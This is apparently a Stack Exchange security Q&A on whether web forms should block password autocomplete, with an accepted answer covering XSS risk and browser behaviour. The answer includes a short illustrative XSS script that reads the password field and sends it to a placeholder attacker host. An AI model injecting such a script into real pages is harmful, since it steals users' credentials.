# Should I prevent password autocomplete?

Tags: security, autocomplete, passwords, standards

There are lots of [replies here](https://stackoverflow.com/questions/2530/how-do-you-disable-browser-autocomplete-on-web-form-field-input-tag) on *how* to prevent password form element autocomplete.  My question is *should* we?

According to the [UK government](https://www.cesg.gov.uk/articles/problems-forcing-regular-password-expiry); forcing password resets (something we're often asked to do by clients) describes a **net-loss in security** and it's actively discouraged.

According to [Mozilla](https://developer.mozilla.org/en-US/docs/Web/Security/Securing_your_site/Turning_off_form_autocompletion); forcing password autocomplete off *also* suggests a **net-loss in security**.  The UK .gov website [doesn't mention](https://www.cesg.gov.uk/guidance/password-guidance-simplifying-your-approach) this particular practice.

### My question:

- Should I attempt to prevent password autocomplete, forcing the user to remember their password, or does the autocomplete provide a net-gain?

// Please cite your sources.

Answer (score 6, accepted):

**Update:** [My blog](https://markitzeroday.com/xss/autocomplete/2018/07/08/password-autocomplete-and-modern-browsers.html) has a proof on concept if you wish to try this out in your browser.

The classic risk of allowing password autocomplete is that any XSS flaw on your website will allow an attacker to grab the password. This is because the browser will autocomplete the password field value, so it will be available in the DOM.

```
<script>
new Image().src = "//evil.example.com/?password=" + escape(document.getElementById('password').value);
</script>
```

However, if an attacker can inject a password field themselves in their XSS attack, they could inject one with autocomplete enabled anyway, regardless of the autocomplete setting on your real password field. Classically though, the attribute would prevent the password from being saved in the first place and therefore couldn't be autocompleted in any attack.

As per your [Mozilla link](https://developer.mozilla.org/en-US/docs/Web/Security/Securing_your_site/Turning_off_form_autocompletion), browsers now ignore `autocomplete="off"`:

> - if a site sets autocomplete="off" for a form, and the form includes username and password input fields, then the browser will still offer
>   to remember this login, and if the user agrees, the browser will
>   autofill those fields the next time the user visits this page.
> - if a site sets autocomplete="off" for username and password input fields, then the browser will still offer to remember this login, and
>   if the user agrees, the browser will autofill those fields the next
>   time the user visits this page.
>
> This is the behavior in Firefox (since version 38), Google Chrome (since 34), and Internet Explorer (since version 11).

Therefore, the answer to your question is "it doesn't make any difference". Additionally, browsers sometimes prompt before completing login credentials, and password managers such as Lastpass can be set to not auto complete fields without the user choosing which login to use first. Some vulnerability scanners (and therefore pentesters relying on these) might raise a low risk issue that autocomplete is enabled on password fields. If so, you should be able to confidently point them in the direction of the Mozilla link. **However**, one thing to note is that if you are gaining PCI compliance, you may need to still remediate this. Please see [my blog post](https://markitzeroday.com/xss/autocomplete/2018/07/08/password-autocomplete-and-modern-browsers.html) for a more in-depth analysis.

Comment: Thanks @silverlightfox. I hadn't considered the XSS complexity. For what it's worth `autocomplete="new-password"` is still effective for Chrome at version 52; it doesn't prevent storage of the password but does prevent completion on subsequent visits. No effect from what I can tell in FF.